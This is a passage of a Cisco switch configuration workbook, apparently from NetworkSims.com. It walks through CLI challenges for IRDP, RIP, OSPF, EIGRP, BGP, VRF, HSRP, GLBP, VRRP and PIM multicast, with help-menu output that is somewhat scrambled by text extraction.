frame-relay Enable ARP for a frame relay interf
probe
HP style arp protocol
snap
IEEE 802.3 style arp
timeout
Set ARP cache timeout
(config-if)# arp arpa
(config-if)# arp t ?
<0-2147483> Seconds
(config-if)# arp timeout 10
(config-if)# ip ?
access-group
accounting
NetworkSims.com
228
address
authentication
bandwidth-percent
bgp
broadcast-address
cef
cgmp
Enable/disable CGMP
dhcp
Configure DHCP parameters for this interface
dvmrp
hello-interval
helper-address
hold-time
igmp
irdp
load-sharing
local-proxy-arp
Enable local-proxy ARP
mask-reply
mrm
mroute-cache
mtu
multicast
ospf
pim
policy
probe
proxy-arp
Enable proxy ARP
rarp-server
redirects
rgmp
Enable/disable RGMP
rip
route-cache
sap
sdr
security
split-horizon
summary-address
unnumbered
unreachables
urd
Configure URL Rendezvousing
vrf
wccp
(config-if)# ip proxy-arp

Area: Switches IP Unicast Routing (IDRP)
Outline
This challenge involves configuring ICMP Router Discovery Protocol (IDRP), which can be
used to dynamically learn routes to other networks. For this it sends out discovery packets.
Objectives
NetworkSims.com
229
Define Layer 3 operation on FA0/1.

Enable IDRP.
Define IDRP details.

> enable
# config t
(config)# int fa0/1
(config)# no switchport
(config-if)# ip irdp ?
(config-if)# ip irdp multicast
(config-if)# ip irdpmaxadvertinterval
(config-if)# ip irdpholdtime 10
(config-if)# ip irdpminadvertinterval
(config-if)# ip irdppreference 0
10
5
Example
> enable
# config t
(config)# int fa0/1
<cr>
address
addresses to proxy-advertise
holdtime
how long a receiver should believe the information
maxadvertinterval maximum time between advertisements
minadvertinterval minimum time between advertisements
multicast
advertisements are sent with multicasts
preference
preference level for this interface
(config-if)# ip irdp multicast
(config-if)# ip irdp max ?
0
advertise only when solicitated
<4-1800> maximum time between advertisements (default 600 seconds)
(config-if)# ip irdp ma ?
0
advertise only when solicitated
<4-1800> maximum time between advertisements (default 600 seconds)
(config-if)# ip irdp maxadvertinterval 10
(config-if)# ip irdp holdtime ?
<0-9000> holdtime (default 1800 seconds)
(config-if)# ip irdp holdtime 10
(config-if)# ip irdp minadvertinterval ?
<3-1800> minimum time between advertisements (default 450 seconds)
(config-if)# ip irdp minadvertinterval 5
(config-if)# ip irdpp ?
<-2147483648 - 2147483647>
preference for this address (higher values

preferred)
(config-if)# ip irdp preference 0
Notes
NetworkSims.com
230
The minadvertinterval and holdtime are based on the maxadvertinterval, where

minadvertinterval is, as a default, set to 75% of the maxadvertinterval, and the holdtime is,
by default, set to three times the maxadvertinterval. Thus maxadvertinterval must be set
before the other two, as they will be set automatically to the default. After this the
minadvertinterval and holdtime can then be customized.

Area: Switches IP Unicast Routing (Broadcast handling)
Outline
This challenge involves defining the ports and protocols are used for forwarding broadcast
packets (ip forward-protocol), and where there is a broadcast-to-physical translation on an
interface (ip directed-broadcast).
Objectives

Define details for forwarding broadcast packets (ip forward-protocol).
Enable the broadcast-to-physical translation on an interface (ip directed-broadcast).

> enable
# config t
(config)# int fa0/1
(config-if)# ip directed-broadcast
(config-if)# exit
(config)# ip forward-protocol udp time
(config)# ip forward-protocol udp echo
(config)# ip forward-protocol udp syslog
Example
> enable
# config t
(config)# int fa0/1
(config-if)# ip directed-broadcast ?
<1-199>
<cr>
(config-if)# exit
NetworkSims.com
231
(config)# ip forward-protocol ?
nd
sdns
turbo-flood
udp
(config)# ip forward-protocol udp ?
<0-65535>
Port number
biff
bootpc
bootps
discard
Discard (9)
dnsix
domain
echo
Echo (7)
isakmp
Internet Security Association and Key Management Protocol (500)
mobile-ip
nameserver
netbios-ns
netbios-ss
ntp
rip
snmp
snmptrap
SNMP Traps (162)
sunrpc
syslog
System Logger (514)
tacacs
talk
Talk (517)
tftp
time
Time (37)
who
xdmcp
X Display Manager Control Protocol (177)
<cr>

Area: Switches IP Unicast Routing (Broadcast handling/helper address)
Outline
This challenge involves defining the ports and protocols are used for forwarding broadcast
packets (ip forward-protocol), and a helper address for broadcasts.
Objectives

Define details for forwarding broadcast packets (ip forward-protocol).
NetworkSims.com
232
Define a helper-address.

> enable
# config t
(config)# int fa0/1
Example
> enable
# config t
nd
sdns
turbo-flood
udp
(config)# ip forward-protocol spanning-tree
(config)# int fa0/1
(config-if)# ip helper-address ?
A.B.C.D IP destination address

Area: Switches IP Unicast Routing (Broadcast handling/IP flooding)
Outline
This challenge involves defining an address to deal with broadcasts (ip broadcast-address),
and the enabling of fast flooding for UDP broadcast (ip forward-protocol turbo-flood).
Objectives

Define details for the broadcast address.
NetworkSims.com
233
Enable turbo-flooding support.

> enable
# config t
(config)# int fa0/1
(config-if)# ip broadcast-address 1.2.3.4
(config-if)# exit
(config)# ip forward-protocol turbo-flood
Example
> enable
# config t
nd
sdns
turbo-flood
udp
(config)# ip forward-protocol turbo-flood
(config)# int fa0/1
(config-if)# ip broadcast-address ?
A.B.C.D IP broadcast address
(config-if)# ip broadcast-address 1.2.3.4
(config-if)# exit

Area: Switches IP Unicast Routing (IP Routing/ RIP)
Outline
This challenge involves enabling IP routing (ip routing), and configuring RIP.
Objectives
Enable IP routing.
Define RIP details for the network to broadcast into.

> enable
NetworkSims.com
234
# config t
(config)# ip routing
(config-router)# router rip
(config-router)# neighbor 10.0.0.1
Example
> enable
# config t
(config)# router ?
bgp
egp
Exterior Gateway Protocol (EGP)
eigrp
igrp
Interior Gateway Routing Protocol (IGRP)
isis
ISO IS-IS
mobile
Mobile routes
odr
ospf
rip
static
Static routes
Switch(config-router)# ?
address-family
auto-summary
default
default-information
default-metric
distance
distribute-list
exit
help
input-queue
maximum-paths
neighbor
network
no
offset-list
output-delay
passive-interface
redistribute
protocol
timers
traffic-share
routing updates
version
Set routing protocol version (config-router)
# network ?
A.B.C.D Network number

NetworkSims.com
235

Outline
This challenge involves enabling IP routing (ip routing), and configuring RIP.
Objectives
Enable IP routing.
Define RIP version.
Define RIP timers.
Disable auto-summary.

> enable
# config t
(config-router)# timers basic 10 10 10 10
Example
> enable
# config t
(config-router)# version ?
<1-2> version
(config-router)# timers ?
basic Basic routing protocol update timers
(config-router)# timers basic ?
<0-4294967295> Interval between updates
(config-router)# timers basic 10 ?
<1-4294967295> Invalid
(config-router)# timers basic 10 10 ?
<0-4294967295> Holddown
(config-router)# timers basic 10 10 10 ?
<1-4294967295> Flush
(config-router)# timers basic 10 10 10 10 ?
<1-4294967295> Sleep time, in milliseconds
NetworkSims.com
236
<cr>
(config-router)# no ?
address-family
auto-summary
default-information
default-metric
distance
distribute-list
flash-update-threshold
input-queue
maximum-paths
neighbor
network
offset-list
output-delay
passive-interface
redistribute

Specify flash update threshold in second
protocol
timers
traffic-share
routing updates
version

Outline
This challenge involves enabling RIP authentication.
Objectives
Enable IP routing.
Define RIP version.
Define RIP Version 2.
Define Authenticated RIP.

> enable
# config t
(config)# key chain test
(config-keychain-key)# key-string mykey
NetworkSims.com
237
(config)# int fa0/1
(config-if)# ip rip authentication key-chain test
Example
> enable
# config t
(config)# key ?
chain
WORD Key-chain name
(config)# key chain test
exit
key
Configure a key
no
(config-keychain-key)# ?
Key-chain key configuration commands:
accept-lifetime Set accept lifetime of key
default
exit
Exit from key-chain key configuration mode
key-string
Set key string
no
send-lifetime
Set send lifetime of key
(config-keychain-key)# key-string ?
<0-7> Encryption type (0 to disable encryption, 7 for proprietary)
LINE
The key
(config-keychain-key)# key-string mykey
<1-2> version
(config)# int fa0/1
(config-if)# ip ri ?
receive
send
v2-broadcast
(config-if)# ip rip a ?
mode
Authentication mode
NetworkSims.com
238
(config-if)# ip rip authentication

LINE name of key-chain
md5
key-chain ?
key-chain test
mode ?
mode md5

Outline
This challenge involves defining summary address and split-horizon.
Objectives
Enable IP routing.
Define a summary address.
Define no split-horizon.

> enable
# config t
(config)# int fa0/1
(config-if)# ip summary-address rip 1.2.3.4 255.255.0.0
(config-if)# no ip split-horizon
Example
> enable
# config t
(config)# int fa0/1
(config-if)# ip summary-address ?
eigrp Enhanced Interior Gateway Routing Protocol (EIGRP)
rip
(config-if)# ip summary-address r ?
NetworkSims.com
239
A.B.C.D IP address
(config-if)# ip summary-address r 1.2.3.4 ?
A.B.C.D IP network mask
(config-if)# ip summary-address rip 1.2.3.4 255.255.0.0
(config-if)# no ip ?
access-group
accounting
address
authentication
bandwidth-percent
bgp
broadcast-address
cef
cgmp
Enable/disable CGMP
dhcp
dvmrp
hello-interval
helper-address
hold-time
igmp
irdp
load-sharing
local-proxy-arp
mask-reply
mrm
mroute-cache
mtu
multicast
ospf
pim
policy
probe
proxy-arp
Enable proxy ARP
rarp-server
redirects
rgmp
Enable/disable RGMP
rip
route-cache
sap
sdr
security
split-horizon
summary-address
unnumbered
unreachables
urd
vrf
wccp
(config-if)# no ip split-horizon

Area: Switches IP Unicast Routing (IP Routing/IGRP)
Outline
NetworkSims.com
240
This challenge involves enabling IGRP authentication.

Objectives
Enable IP routing.
Define IGRP details.

> enable
# config t
(config)# router igrp 111
(config-router)# metric maximum-hops 10
Example
> enable
# config t
(config)# router ?
bgp
egp
eigrp
igrp
isis
ISO IS-IS
mobile
Mobile routes
odr
ospf
rip
static
Static routes
(config)# router igrp ?
<1-65535> Autonomous system number
(config)# router igrp 111
(config-router)# ?
default
default-information
default-metric
distance
distribute-list
exit
help
input-queue
maximum-paths
metric
Modify IGRP routing metrics and parameters
neighbor
NetworkSims.com
241
network
no
offset-list
passive-interface
redistribute

protocol
timers
traffic-share
routing updates
variance
Control load balancing variance
(config-router)# metric ?
holddown
Enable IGRP holddown
maximum-hops Advertise IGRP routes greater than <hops> as unreachable
weights
Modify IGRP metric coefficients
(config-router)# metric maximum-hops ?
<1-255> Hop count
(config-router)# metric maximum-hops 10

Area: Switches IP Unicast Routing (IP Routing/OSPF)
Outline
This challenge involves enabling OSPF routing.
Objectives
Enable IP routing.
Define OSPF.

> enable
# config t
(config-router)# net 1.2.3.4 255.255.255.0 area 0
Example
> enable
# config t
NetworkSims.com
242
(config)# router ?
bgp
egp
eigrp
igrp
isis
ISO IS-IS
mobile
Mobile routes
odr
ospf
rip
static
Static routes
(config)# router ospf ?
(config-router)# ?
area
auto-cost
Calculate OSPF interface cost according to bandwidth
capability
Enable specific OSPF feature
compatible
default
default-information
default-metric
discard-route
Enable or disable discard-route installation
distance
distribute-list
domain-id
OSPF domain-id
domain-tag
OSPF domain-tag
exit
help
ignore
log-adjacency-changes Log changes in adjacency state
max-metric
Set maximum metric
maximum-paths
neighbor
network
no
passive-interface
redistribute
router-id
summary-address
timers
traffic-share
(config-router)# net 1.2.3.4 ?
A.B.C.D OSPF wild card bits
(config-router)# net 1.2.3.4 255.255.255.0 ?
area Set the OSPF area ID
(config-router)# net 1.2.3.4 255.255.255.0 a ?
A.B.C.D
(config-router)# net 1.2.3.4 255.255.255.0 a 0 ?
<cr>

NetworkSims.com
243

Outline
This challenge involves enabling OSPF routing and interface OSPF details.
Objectives
Enable IP routing.
Define OSPF.
OSPF details on an interface.

> enable
# config t
(config)# int fa0/1
(config-if)# ip ospf priority 10
(config-if)# ip ospf retransmit-interval 10
(config-if)# ip ospf transmit-delay 10
Example
> enable
# config t
(config)# int fa0/1
authentication
authentication-key
cost
Interface cost
database-filter
dead-interval
demand-circuit
OSPF demand circuit
hello-interval
message-digest-key
mtu-ignore
network
Network type
priority
Router priority
advertisements
transmit-delay
(config-if)# ip ospf cost ?
NetworkSims.com
244
<1-65535>
Cost

(config-if)# ip ospf dead-interval ?
<1-65535> Seconds
(config-if)# ip ospf hello-interval ?
<1-65535> Seconds
(config-if)# ip ospf priority ?
<0-255> Priority
(config-if)# ip ospf priority 10
(config-if)# ip ospf retransmit-interval ?
<1-65535> Seconds
(config-if)# ip ospf retransmit-interval 10
(config-if)# ip ospf transmit-delay ?
<1-65535> Seconds
(config-if)# ip ospf transmit-delay 10

Outline
This challenge involves enabling OSPF routing and area details.
Objectives
Enable IP routing.
Define OSPF.
OSPF area details.

> enable
# config t
NetworkSims.com
245

(config)# int fa0/1
(config-if)# ip ospf
cost 10
dead-interval 10
hello-interval 10
priority 10
retransmit-interval 10
transmit-delay 10
Example
> enable
# config t
(config)# int fa0/1
authentication
authentication-key
cost
Interface cost
database-filter
dead-interval
demand-circuit
OSPF demand circuit
hello-interval
message-digest-key
mtu-ignore
network
Network type
priority
Router priority
advertisements
transmit-delay
(config-router)# ar ?
A.B.C.D
Switch(config-router)# ar 1 authentication ?
message-digest Use message-digest authentication
<cr>
(config-router)# ar 1 r ?

Area: Switches IP Unicast Routing (IP Routing/EIGRP)
Outline
This challenge involves enabling EIGRP authentication.
NetworkSims.com
246
Objectives
Enable IP routing.
Define EIGRP details.

> enable
# config t
(config-router)# eigrp log-neighbor-changes
(config)# int fa0/1
(config-if)# ip summary-address eigrp 100 1.2.3.0
(config-if)# ip hello-interval e 100 5
(config-if)# ip hold-time eigrp 10
Example
> enable
# config t
(config)# router ?
bgp
egp
eigrp
igrp
isis
ISO IS-IS
mobile
Mobile routes
odr
ospf
rip
static
Static routes
(config)# router eigrp ?
(config-router)# ?
auto-summary
default
default-information Control distribution of default information
default-metric
distance
distribute-list
eigrp
EIGRP specific commands
exit
help
maximum-paths
metric
Modify IGRP routing metrics and parameters
NetworkSims.com
247
neighbor
network
no
offset-list
passive-interface
redistribute
timers
traffic-share
variance
(config-router)# eigrp ?
log-neighbor-changes
Enable/Disable IP-EIGRP neighbor logging
log-neighbor-warnings Enable/Disable IP-EIGRP neighbor warnings
router-id
router-id for this EIGRP process
stub
Set IP-EIGRP as stubbed router
(config-router)# eigrp log-neighbor-changes
(config)# int fa0/1
(config-if)# ip summary-address ?
rip
(config-if)# ip summary-address eigrp ?
(config-if)# ip summary-address eigrp 100 1.2.3.0
(config-if)# ip hello-interval ?
(config-if)# ip hello-interval e ?
(config-if)# ip hello-interval e 100 5
(config-if)# ip hold-time ?
(config-if)# ip hold-time eigrp ?
(config-if)# ip hold-time eigrp 10 ?
<1-65535> Seconds before neighbor is considered down
(config-if)# ip hold-time eigrp 10

Area: Switches IP Unicast Routing (IP Routing/BGP)
Outline
This challenge involves enabling BGP routing.
Objectives
NetworkSims.com
248
Enable IP routing.
Define BGP.
BGP AS details.

> enable
# config t
(config)# int fa0/1
Example
> enable
# config t
(config-router)# ?
address-family
aggregate-address
Configure BGP aggregate entries
auto-summary
bgp
BGP specific commands
default
default-metric
distance
distribute-list
exit
help
maximum-paths
neighbor
network
Specify a network to announce via BGP
no
redistribute
synchronization
Perform IGP synchronization
table-map
Map external entry attributes into routing table
timers
(config-router)# net ?
(config-router)# net 1.2.3.40
(config-router)# nei ?
A.B.C.D Neighbor address
WORD
Neighbor tag
(config-router)# nei 1.2.3.4 ?
activate
Enable the Address Family for this Neighbor
advertise-map
specify route-map for conditional advertisement
advertisement-interval
Minimum interval between sending BGP routing updates
allowas-in
Accept as-path with my AS present in it
default-originate
Originate default route to this neighbor
description
Neighbor specific description
NetworkSims.com
249
disable-connected-check
distribute-list
ebgp-multihop
filter-list
local-as
maximum-prefix
next-hop-self
next-hop-unchanged
password
peer-group
prefix-list
remote-as
remove-private-AS
route-map
route-reflector-client
send-community
shutdown
soft-reconfiguration
timers
translate-update
unsuppress-map
update-source
version
weight
one-hop away EBGP peer using loopback address

Filter updates to/from this neighbor
Allow EBGP neighbors not on directly connected
networks
Establish BGP filters
Specify a local-as number
Maximum number of prefix accept from this peer
Disable the next hop calculation for this neighbor
Propagate the iBGP paths's next hop unchanged for
this neighbor
Set a password
Member of the peer-group
Specify a BGP neighbor
Remove private AS number from outbound updates
Apply route map to neighbor
Configure a neighbor as Route Reflector client
Send Community attribute to this neighbor
Administratively shut down this neighbor
Per neighbor soft reconfiguration
BGP per neighbor timers
Translate Update to MBGP format
Route-map to selectively unsuppress suppressed
routes
Source of routing updates
Set the BGP version to match a neighbor
Set default weight for routes from this neighbor
(config-router)# nei 1.2.3.4 remote-a ?

<1-65535> AS of remote neighbor
(config-router)#nei 1.2.3.4 remote-as 130 ?
<cr>
(config-router)# nei 1.2.3.4 remote-as 130
(config)# int fa0/1

Outline
This challenge involves enabling BGP routing.
Objectives
Enable IP routing.
Define BGP.
BGP neighbor details.
NetworkSims.com
250

> enable
# config t
(config-router)# neighbor 1.2.3.4 next-hop-self
(config-router)# neighbor 1.2.3.4 weight 10
(config)# int fa0/1
Example
> enable
# config t
(config-router)# ?
address-family
aggregate-address
Configure BGP aggregate entries
auto-summary
bgp
BGP specific commands
default
default-metric
distance
distribute-list
exit
help
maximum-paths
neighbor
network
Specify a network to announce via BGP
no
redistribute
synchronization
Perform IGP synchronization
table-map
Map external entry attributes into routing table
timers
(config-router)# net ?
(config-router)# net 1.2.3.40
(config-router)# nei ?
WORD
Neighbor tag
(config-router)# nei 1.2.3.4 ?
activate
advertise-map
allowas-in
default-originate
description
disable-connected-check one-hop away EBGP peer using loopback address
distribute-list
ebgp-multihop
networks
filter-list
local-as
NetworkSims.com
251
maximum-prefix
next-hop-self
next-hop-unchanged
password
peer-group
prefix-list
remote-as
remove-private-AS
route-map
send-community
shutdown
timers
translate-update
unsuppress-map
update-source
version
weight

this neighbor
Set a password
routes
(config-router)# nei 1.2.3.4 remote-a ?

<1-65535> AS of remote neighbor
(config-router)# nei 1.2.3.4 remote-as 130 ?
<cr>
(config-router)# nei 1.2.3.4 remote-as 130
(config-router)# nei 1.2.3.4 next-hop-self
(config-router)# nei 1.2.3.4 w ?
<0-65535> default weight
(config-router)# nei 1.2.3.4 weight 10
(config)# int fa0/1

Outline
This challenge involves enabling BGP routing with a route-map
Objectives
Enable IP routing.
Define BGP.
BGP neighbor details with a route-map
NetworkSims.com
252

> enable
# config t
(config)# route-map TESTING permit 10
(config-route-map)# match community test
(config-route-map)# set community new
(config-router)# neighbor 1.2.3.4 route-map TESTING in
Example
> enable
# config t
(config-route-map)# ?
Route Map configuration commands:
default
description Route-map comment
exit
Exit from route-map configuration mode
help
match
Match values from routing table
no
set
Set values in destination routing protocol
(config-route-map)# match ?
as-path
Match BGP AS path list
community
Match BGP community list
extcommunity Match BGP/VPN extended community list
interface
Match first hop interface of route
ip
IP specific information
length
Packet length
metric
Match metric of route
route-type
Match route-type of route
tag
Match tag of route
(config-route-map)# match community ?
<1-99>
Community-list number (standard)
<100-199> Community-list number (expanded)
WORD
Community-list name
(config-route-map)# match community test
(config-route-map)#
as-path
automatic-tag
comm-list
community
dampening
default
extcommunity
interface
ip
level
local-preference
metric
metric-type
origin
tag
traffic-index
weight
NetworkSims.com
set ?
Prepend string for a BGP AS-path attribute
Automatically compute TAG value
set BGP community list (for deletion)
BGP community attribute
Set BGP route flap dampening parameters
Set default information
BGP extended community attribute
Output interface
IP specific information
Where to import route
BGP local preference path attribute
Metric value for destination routing protocol
Type of metric for destination routing protocol
BGP origin code
Tag value for destination routing protocol
BGP traffic classification number for accounting
BGP weight for routing table
253
(config-route-map)# set community ?

<1-4294967295> community number
aa:nn
community number in aa:nn format
additive
Add to the existing community
internet
Internet (well-known community)
local-AS
Do not send outside local AS (well-known community)
no-advertise
Do not advertise to any peer (well-known community)
no-export
Do not export to next AS (well-known community)
none
No community attribute
<cr>
(config-route-map)# set community new
(config-router)# neighbor ?
WORD
Neighbor tag
(config-router)# neighbor 1.2.3.4 ?
activate
advertise-map
allowas-in
default-originate
description
disable-connected-check one-hop away EBGP peer using loopback address
distribute-list
ebgp-multihop
networks
filter-list
local-as
maximum-prefix
next-hop-self
next-hop-unchanged
this neighbor
password
Set a password
peer-group
prefix-list
remote-as
remove-private-AS
route-map
send-community
shutdown
timers
translate-update
unsuppress-map
routes
update-source
version
weight
(config-router)# neighbor 1.2.3.4 route-m ?
WORD Name of route map
(config-router)# neighbor 1.2.3.4 route-m TESTING

NetworkSims.com
254
Outline
This challenge involves enabling VRF (VPN Routing Forwarding).
Objectives
Enable IP routing.
Define VRF.
Apply VRF forwarding on an interface.

> enable
# config t
(config)# ip vrf NEWV
(config-vrf)# input m TESTING
(config-vrf)# rd 192.168.1.1:12
(config-vrf)# exit
(config)# int fa0/1
(config-if)# ip vrf forwarding NEWV
Example
> enable
# config t
(config)# ip vrf NEWV
(config-vrf)# ?
IP VPN Routing/Forwarding instance configuration commands:
default
description
VRF specific description
exit
Exit from VRF configuration mode
export
VRF export
import
VRF import
maximum
Set a limit
no
rd
Specify Route Distinguisher
route-target Specify Target VPN Extended Communities
(config-vrf)# input ?
map Route-map based VRF import
(config-vrf)# input m ?
WORD VRF import route-map name
(config-vrf)# input m TESTING
(config-vrf)# rd ?
NetworkSims.com
255
ASN:nn or IP-address:nn
VPN Route Distinguisher
(config-vrf)# rd 192.168.1.1:12 ?
<cr>
(config-vrf)# rd 192.168.1.1:12
(config-vrf)# exit
(config)# int fa0/1
(config-if)# ip vrf ?
forwarding Configure forwarding table
sitemap
Configure route-map for routes received from this site
(config-if)# ip vrf forwarding ?
WORD Table name
(config-if)# ip vrf forwarding NEWV

Unit 5: Multilayer Switching

Outline
This challenge involves the configuration hot standby (HSRP).
Objectives
Define the standby port.

Define HSRP parameters.
Example
Switch# config t
Switch(config-if)# no switchport
Switch(config-if)# standby ?
<0-255>
group number
authentication Authentication
NetworkSims.com
256
delay
HSRP initialisation delay
ip
Enable HSRP and set the virtual IP address
name
Redundancy name string
preempt
Overthrow lower priority designated routers
priority
Priority level
timers
Hello and hold timers
track
Priority tracking
Switch(config-if)# standby ip ?
A.B.C.D Virtual IP address
<cr>
Switch(config-if)# standby ip 192.168.128.3
Switch(config-if)# standby priority ?
Switch(config-if)# standby priority 120 ?
preempt Overthrow lower priority designated routers
<cr>
Switch(config-if)# standby priority 120 preempt ?
delay Wait before preempting
<cr>
Switch(config-if)# standby priority 120 preempt delay ?
<0-3600> Number of seconds to delay
minimum
Delay at least this long
sync
Wait for IP redundancy clients
Switch(config-if)# standby priority 120 preempt delay 300
Switch(config-if)# end
Switch# sh sta
FastEthernet0/1 - Group 0
Local state is Init (interface down), priority 120, may preempt
Preemption delayed for at least 300 secs
Hellotime 3 sec, holdtime 10 sec
Virtual IP address is 192.168.128.3 configured
Active router is unknown
Standby router is unknown
0 state changes, last state change never
IP redundancy name is "hsrp-Fa0/1-0" (default)
5.1
Explanation
HSRP uses an active router, a standby router, and a virtual router. The active router is the
normal routing device, and the standby router listens to all the traffic going to and from the
active device, as well as sending HELLO packets. If it detects a failure of the active device it
takes over its IP address and MAC address, so that hosts do not notice the failure of the
main device. The objective is thus to provide a consistent gateway address for the hosts.
HSRP allows the switch to provide failover for another device. To activate HSRP the
standby ip interface configuration command is used. If there is an IP address in this
command, it will be used as a standby address, otherwise it will be learned through the
standby function.
NetworkSims.com
257
Ref:
http://www.cisco.com/en/US/products/hw/switches/ps5023/products_configuration_guide_
chapter09186a008047646d.html#wp1059790

Outline
This challenge involves the configuration of multiple hot standby (MHSRP).
Objectives
Define the standby port.

Define MHSRP parameters.
Example
Switch# config t
Switch(config)# interface fa0/1
Switch(config-if)# ip address 10.0.0.1 255.255.255.0
Switch(config-if)# standby 1 ip 10.0.0.3
Switch(config-if)# standby 1 priority 110
Switch(config-if)# standby 1 preempt
Switch(config-if)# standby 2 ip 10.0.0.4
Switch(config-if)# standby 2 preempt
Switch(config-if)# end

Outline
Gateway Load Balancing Protocol (GLBP) in the same way as Hot Standby Router Protocol
(HSRP) and Virtual Router Redundancy Protocol (VRRP) provides an alternative route for
network traffic from a failed router or circuit. It also supports load sharing between a group
of redundant routers. This challenge involves the configuration of GLBP.
Objectives
NetworkSims.com
258
Define GLBP details.

Enable GLBP.
Outline
(config)# interface fa0
(config-if)# glbp 10 authentication text testing
(config-if)# glbp 10 forwarder preempt delay minimum 60
(config-if)# glbp 10 load-balancing host-dependent
(config-if)# glbp 10 preempt delay minimum 60
(config-if)# glbp 10 priority 254
(config-if)# glbp 10 timers 5 18
(config-if)# glbp 10 ip 192.168.0.2
Example
(config-if)# glbp ?
<0-1023> Group number
(config-if)# glbp 10 ?
authentication Authentication method
forwarder
Forwarder configuration
ip
Enable group and set virtual IP address
load-balancing Load balancing method
name
Redundancy name
preempt
priority
Priority level
timers
Adjust GLBP timers
weighting
Gateway weighting and tracking
(config-if)# glbp 10 authentication ?
md5
MD5 authentication
text Plain text authentication
(config-if)# glbp 10 authentication text ?
WORD Text authentication string
(config-if)# gl 10 forwarder ?
preempt Overthrow lower priority active forwarders
(config-if)# gl 10 forwarder preempt ?
<cr>
(config-if)# gl 10 forwarder preempt delay ?
minimum Delay at least this long
(config-if) glbp 10 forwarder preempt delay minimum ?
<0-3600> Number of seconds for minimum delay
(config-if)# glbp 10 load-balancing ?
host-dependent Load balance equally, source MAC determines forwarder choice
round-robin
Load balance equally using each forwarder in turn
weighted
Load balance in proportion to forwarder weighting
NetworkSims.com
259
(config-if)# glbp 10 pre ?

<cr>
(config-if)# glbp 10 pri ?
(config-if)# glbp 10 timers ?
<1-60>
Hello interval in seconds
msec
Specify hello interval in milliseconds
redirect Specify time-out values for failed forwarders
(config-if)# glbp 10 ip ?
glbp 10 authentication text testing
This command authenticates GLBP packets

received from the group of routers.
glbp
10
forwarder
preempt
delay This command allows the router to take
minimum 60
over as AVF (Active Virtual Forwarder)
within a GLBP group, if it has a higher
priority than the current AVF.
glbp 10 load-balancing host-dependent
This command specifies the load balancing
method such as: host-dependent, roundrobin or weighted.
glbp 10 preempt delay minimum 60
This command allows the router to take
over as AVG (Active Virtual Gateway)
with a GLBP group, if it has a higher
priority than the current AVG.
glbp 10 priority 254
This command sets up the priority level of
the gateway within a GLBP group.
glbp 10 timers 5 18
This command configures the interval
between hello packets sent by the AVG
within the GLBP group. The parameters
include the holdtime which specifies time
before the virtual gateway and virtual
forwarder information is considered
invalid.
glbp 10 ip 192.168.0.2
Enable GLBP and define a virtual interface
address.

Outline
Virtual Router Redundancy Protocol (VRRP) in the same way as Hot Standby Router
Protocol (HSRP) and Gateway Load Balancing Protocol (GLBP). It provides an alternative
NetworkSims.com
260
route for network traffic from a failed router or circuit.. This challenge involves the
configuration of VRRF.
Objectives
Define VRRF details.

Enable VRRF.
Outline
(config-if)# vrrp 10 description text
(config-if)# vrrp 10 priority level
(config-if)# vrrp 10 preempt delay minimum 10
(config-if)# vrrp group timers learn
(config-if)# vrrp IP 192.168.0.2
Example
Cisco Switch Test 6

Unit 6: Availability and Redundancy
NetworkSims.com
261
CCNP BCMSN Part 2

Outline
This challenge involves the setting up multicast routing.
Objectives
Enable multicasting routing.

Define that the interface port should be defined as a Layer 3 port (using no
switchport).
Define PIM parameters on an interface port.
Example
> enable
Switch# config t
Switch(config)# ip multicast
Switch(config-if)# ip pim ?
bsr-border
Border of PIM domain
dense-mode
Enable PIM dense-mode operation
nbma-mode
Use Non-Broadcast Multi-Access (NBMA) mode on interface
neighbor-filter
PIM peering filter
query-interval
PIM router query interval
sparse-dense-mode Enable PIM sparse-dense-mode operation
sparse-mode
Enable PIM sparse-mode operation
version
PIM version
<cr>
Switch(config-if)# ip pim version ?
<1-2> version number
Switch(config-if)# ip pim version 2
Switch(config-if)# ip pim dense-mode ?
proxy-register Send proxy registers
<cr>
Switch(config-if)# ip pim dense-mode
Switch(config-if)# ip pim bsr-border
NetworkSims.com
262
Note: You will not see the ip pim command on an interface unless it is defined as a Layer 3
port.

Outline
This challenge involves manually defining a rendezvous point (RP) for a multicast group.
Objectives

Define an RP.
Example
> enable
Switch# config t
Switch(config)# access-list 1 permit 224.1.1.1 0.0.0.0
Switch(config)# ip pim ?
accept-register
Registers accept filter
accept-rp
RP accept filter
autorp
Configure AutoRP global operations
bsr-candidate
Candidate bootstrap router (candidate BSR)
register-rate-limit Rate limit for PIM data registers
rp-address
PIM RP-address (Rendezvous Point)
rp-announce-filter
Auto-RP announce message filter
rp-candidate
To be a PIMv2 RP candidate
send-rp-announce
Auto-RP send RP announcement
send-rp-discovery
Auto-RP send RP discovery message (as RP-mapping agent)
spt-threshold
Source-tree switching threshold
ssm
Configure Source Specific Multicast
Switch(config)# ip pim rp-address ?
A.B.C.D IP address of Rendezvous-point for group
Switch(config)# ip pim rp-address 1.2.3.4 ?
<1-99>
Access-list reference for group
<1300-1999> Access-list reference for group (expanded range)
WORD
IP Named Standard Access list
override
Overrides Auto RP messages
<cr>
Switch(config)# ip pim rp-address 1.2.3.4 1

Outline
NetworkSims.com
263
This challenge involves auto-RP for an existing sparse-mode cloud in mulitcast routing.
Objectives

Define an auto-RP.
Example
> enable
Switch# config t
Switch(config)# ip pim ?
accept-register
accept-rp
RP accept filter
autorp
bsr-candidate
register-rate-limit Rate limit for PIM data registers
rp-address
rp-announce-filter
rp-candidate
send-rp-announce
send-rp-discovery
spt-threshold
ssm
Switch(config)# ip pi send-rp-announce ?
Async
Async interface
BVI
Dialer
Dialer interface
FastEthernet
GigabitEthernet
Lex
Lex interface
Loopback
Loopback interface
Multilink
Null
Null interface
Port-channel
Tunnel
Tunnel interface
Virtual-Template
Vlan
Catalyst Vlans
Switch(config)# ip pim send-rp-announce fa0/1 ?
Switch(config)# ip pim send-rp-announce fa0/1 ?
scope RP announcement scope
Switch(config)# ip pim send-rp-announce fa0/1 scope ?
<1-255> TTL of the RP announce packet
Switch(config)# ip pim send-rp-announce fa0/1 scope 30 ?
group-list Group access-list
interval
RP announcement interval
<cr>
Switch(config)# ip pim send-rp-announce fa0/1 scope 30 group-list ?
<1-99> Access-list reference for multicast groups
NetworkSims.com
264
WORD
Switch(config)# ip pim send-rp-announce fa0/1 scope 30 group-list 5 ?

interval RP announcement interval
<cr>
Switch(config)# ip pim send-rp-announce fa0/1 scope 30 group-list 5
Switch(config)# ip pim accept-rp ?
A.B.C.D IP address of RP for group
auto-rp only RP-mapping from Auto-RP
Switch(config)# ip pim accept-rp 1.2.3.4 ?
<1-99>
WORD
<cr>
Switch(config)# ip pim accept-rp 1.2.3.4 5

Outline
This challenge involves preventing candidate RP spoofing.
